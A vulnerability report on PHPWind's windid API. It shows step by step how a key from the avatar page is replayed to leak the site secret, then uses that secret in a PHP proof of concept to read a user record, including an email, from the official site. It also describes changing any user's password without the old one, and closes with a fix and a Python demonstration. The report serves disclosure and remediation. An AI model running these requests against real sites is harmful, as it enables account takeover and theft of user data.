A high-risk PHPWIND shell Vulnerability
I didn't expect PHPWIND to commit the same vulnerability as PHPCMS.
Code in src/applications/windidserver/api/controller/AppController.php:

    public function listAction() {
        $result = $this->_getAppDs()->getList();
        $this->output($result);
    }
How can a key that is accepted by this interface be obtained?
Look at the avatar upload page:
/Phpwind/src/windid/service/user/srv/WindidUserService.php
Its internal code computes the key as:

    $key = WindidUtility::appKey($appId, $time, $appKey, array('uid'=>$uid, 'type'=>'flash'), array('uid'=>'undefined'));
Open the avatar page and view its page source:
http://localhost/phpwind/index.php?m=profile&c=avatar&_left=avatar
URL-decoded, the windid request embedded in the source is:
http://localhost/phpwind/windid/index.php?m=api&c=avatar&a=doAvatar&uid=1&windidkey=f5b35f56c88695b9069e18ecaafad874&time=1408197299&clientid=1&type=flash&avatar=http://localhost/phpwind/windid/attachment/avatar/000/00/00/1.jpg?r=88418
Remove the trailing parameter
&avatar=http://localhost/phpwind/windid/attachment/avatar/000/00/00/1.jpg?r=88418
Remember to POST uid=undefined, the value the signing code above includes in the key.
Replace doAvatar with list and avatar with app:
http://localhost/phpwind/windid/index.php?m=api&c=app&a=list&uid=1&windidkey=f5b35f56c88695b9069e18ecaafad874&time=1408197299&clientid=1&type=flash
POST: uid=undefined
Response:
{"1":{"id":"1","name":"phpwind9.0","siteurl":"http:\/\/localhost\/phpwind","siteip":"","secretkey":"73e3dcdd733c7c3733c17273a624e162","apifile":"windid.php","charset":"gbk","issyn":"1","ispolicy":"1"}}
With this key, I can do too many things, and I can do everything in the user system.
I tested it on the official website, obtained the key, and tested reading a user's information:
    <?php
    // PoC from the report: read a user record through the windid user API with the leaked secret.
    $secretkey = '308c6c43a*****279dd61dd80e8d59bd';   // site secretkey (masked in the report)
    $c = 'user';
    $a = 'get';
    $data = array('uid' => '658925');                  // POST body
    $time = time();                                    // one timestamp, reused for the key and the URL
    $key = appKey('1', $time, $secretkey, array('userid' => 658925), $data);
    echo post('http://www.phpwind.net/windid/index.php?m=api&c=' . $c . '&a=' . $a
        . '&windidkey=' . $key . '&time=' . $time . '&clientid=1&userid=658925', $data);

    function post($uri, $data) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $uri);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $return = curl_exec($ch);
        curl_close($ch);
        return $return;
    }

    // Reimplementation of the windid appKey signing scheme.
    // Note that m, c and a are excluded from the signed string.
    function appKey($apiId, $time, $secretkey, $get, $post) {
        $array = array('m', 'c', 'a', 'windidkey', 'clientid', 'time', '_json', 'jcallback',
                       'csrf_token', 'Filename', 'Upload', 'token');
        $str = '';
        ksort($get);
        ksort($post);
        foreach ($get as $k => $v) {
            if (in_array($k, $array)) continue;
            $str .= $k . $v;
        }
        foreach ($post as $k => $v) {
            if (in_array($k, $array)) continue;
            $str .= $k . $v;
        }
        return md5(md5($apiId . '||' . $secretkey) . $time . $str);
    }
    ?>
{"uid":"658925","username":"phpwind","email":"fengyu@phpwind.net","safecv":"5b4111de","regdate":"1143101940","regip":""}
The user API also exposes an edit interface that can change any user's password. If old_password is omitted from the call, the password is changed without the original password being verified.
Solution:
Do not trust the key as it stands: include m, c and a in the key computation, so that a key signed for one controller and action is not valid for another.
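To make the flaw and the fix concrete, the following is an added Python port of the appKey scheme from the PoC above (example code, not PHPWind's own); the API id, secret and timestamp are constructed sample values. It shows that with m, c and a excluded, the key signed for the avatar request also verifies for the app list action, and that signing those three parameters separates the two.

```python
import hashlib
import hmac

# Constructed sample values (assumptions for this example, not a real site's secret).
API_ID = "1"
SECRET = "0123456789abcdef0123456789abcdef"
TIME = 1408197299

# Parameters that the PoC's appKey() leaves out of the signed string.
EXCLUDED = {"m", "c", "a", "windidkey", "clientid", "time", "_json", "jcallback",
            "csrf_token", "Filename", "Upload", "token"}
# The fix suggested above: the routing parameters m, c and a are signed as well.
EXCLUDED_FIXED = EXCLUDED - {"m", "c", "a"}


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def app_key(api_id, t, secret, get, post, excluded=EXCLUDED):
    """Port of the PoC's appKey(): md5(md5(apiId||secret) . time . sorted k/v pairs)."""
    s = ""
    for params in (get, post):          # GET pairs first, then POST pairs, as in the PHP
        for k in sorted(params):        # ksort()
            if k not in excluded:
                s += k + str(params[k])
    return _md5(_md5(f"{api_id}||{secret}") + str(t) + s)


def verify(get, post, secret, excluded=EXCLUDED):
    """Server-side check: recompute the key over the parameters actually received."""
    expected = app_key(get["clientid"], get["time"], secret, get, post, excluded)
    return hmac.compare_digest(expected, get["windidkey"])


def demo(excluded=EXCLUDED):
    """Sign the avatar request, then replay its key against the app list action."""
    avatar = {"m": "api", "c": "avatar", "a": "doAvatar", "uid": 1, "type": "flash",
              "clientid": API_ID, "time": TIME}
    post = {"uid": "undefined"}
    avatar["windidkey"] = app_key(API_ID, TIME, SECRET, avatar, post, excluded)
    replay = dict(avatar, c="app", a="list")   # same key, different controller/action
    return verify(avatar, post, SECRET, excluded), verify(replay, post, SECRET, excluded)


if __name__ == "__main__":
    print("original scheme (avatar ok, replay ok):", demo())
    print("m/c/a signed (avatar ok, replay ok):   ", demo(EXCLUDED_FIXED))
```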